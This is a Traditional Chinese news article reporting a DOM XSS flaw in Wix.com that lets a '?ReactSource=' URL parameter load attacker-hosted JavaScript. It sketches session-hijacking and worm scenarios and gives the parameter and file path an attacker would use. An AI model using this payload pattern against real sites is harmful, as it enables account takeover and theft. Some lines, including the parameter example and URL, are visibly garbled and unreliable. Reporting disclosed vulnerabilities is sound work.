標籤:

Wix.com存在嚴重的DOM XSS漏洞 數百萬網站陷於危險之中

Web主機雲服務提供商Wix.com存在Dom型XSS漏洞,該漏洞可以讓攻擊者控制在該平台上託管的任何一個網站,數百萬託管在Wix.com上的網站可能面臨安全風險。

該漏洞由Contrast Security的高級安全研究員Matt Austin得以證實。據OWASP報告表示,基於DOM的XSS攻擊(或者在一些情況下稱為「type-0 XSS」)是XSS攻擊的其中一種形式,但是此漏洞不同於傳統的XSS漏洞(payload存儲於一個HTTP(S)請求的響應頁面中),DOM型XSS漏洞通過客戶端腳本修改用戶瀏覽器中文檔對象模型(DOM)環境,並且惡意代碼會影響客戶端代碼的執行。也就是說,頁面本身(HTTP響應)沒有變化,但是客戶端代碼頁中包含不同的執行命令,因為DOM環境已經被惡意修改。

基於DOM的XSS與XSS攻擊是有所區別的。XSS攻擊是攻擊者將自己的腳本代碼注入到有Web應用程序生成的網頁中,當有用戶瀏覽該網頁時,攻擊者的腳本可以被解釋執行,從而達到攻擊的目的;基於DOM的XSS攻擊主要存在於頁面中客戶端本身。

以下內容主要摘錄自Austin的博客文章:

「Wix.com有一個嚴重的DOM XSS漏洞,允許攻擊者針對託管在Wix.com上的任何網站實施攻擊。只需要在Wix上創建的網站上添加單個參數,攻擊者可以讓他們的惡意JavaScript代碼在該網站上載入執行。」n

TL;DR:(篇幅過長,概括如下)

1. 在wix.com網站上的任何站點的任何URL上添加「?ReactSource=Evil.Com - We get it...Daily.」n2. 確保evil.com在/packages-bin/wixCodeInit/wixCodeInit.min.jshost一個惡意文件n

這裡有一個正在發生的漏洞案例,導致了一個反映負載出現:

Austin表示,儘管早在十月份的時候就已經把漏洞信息向Wix通報,但是截止到本周三這個漏洞仍然沒有被修復。Wix.com也沒有對這個報告發表過任何回復。據Wix.com官方統計,在該平台共計8600萬用戶。

Austin分析了2種反射DOM型XSS漏洞的攻擊場景。其中一種是誘導Wix網站所有者點擊一個惡意的URL鏈接。這個URL會載入一個精心構造的JavaScript代碼劫持受害者瀏覽器的session信息。

隨後攻擊者可以侵佔受害者的瀏覽器session,這樣他就可以像原來的用戶那樣,執行任意的操作了。攻擊者可以對受害者原先掌控著的Wix網站進行修改,例如向第三方提供網站管理員的權利,或滲透一個Wix電子商務站點來竊取信用卡號碼。

Austin說,擁有Wix.com站點的管理員控制許可權後,就能分發惡意軟體,創建一個動態的、分散式的、基於瀏覽器的殭屍網路,竊取網路貨幣,並控制網站的內容和使用它的用戶。

在Austin描述的第二個場景中,可以運用一個精心構造的URL,將用戶誘導進入一個Wix網站。該URL通過一個DOM型的XSS攻擊,將JavaScript載入到目標的Wix.com網站中。在某種情境中,通過瀏覽器的session信息,可以對一個Wix.com的粉絲網站進行修改,從而將音樂下載替換為惡意軟體下載,或者將PayPal支付重新定向到第三方帳戶。

在DOM XSS攻擊的案例中,攻擊者需要做的就是在伺服器上布置惡意的JavaScript,並用一個URL指向它。例如:「http://matt4592.wixsite.com/mu://m-austin.com「。在這個例子中,根域名」http://matt4592.wixsite.com/mu」後面嵌入了附加的「?ReactSource=http://m-austin.com」, 這為基於DOM的XSS攻擊提供有效載荷創造了條件。

Contrast Security表示,更糟糕的是,利用這種缺陷,網路罪犯可以對攻擊進行擴張,把它變成一個蠕蟲,從而在所有的Wix網站中傳播,這將類似於2005年時臭名昭著的Samy蠕蟲和MySpace蠕蟲——被設計用來針對整個社交網站。

Austin說,前車之鑒告訴我們,想要接管託管在Wix的數以百萬計的網站,其實並不需要花太長的時間。

註:本文參考來源於securityaffairs、threatpost

推薦閱讀:

撥開量子計算的雲霧
怎麼看阿里雲推出的免費虛擬主機?
到底什麼樣的網站才需要辦理ICP許可證?
Salesforce的基礎用戶界面定製

TAG:云服务 | XSS |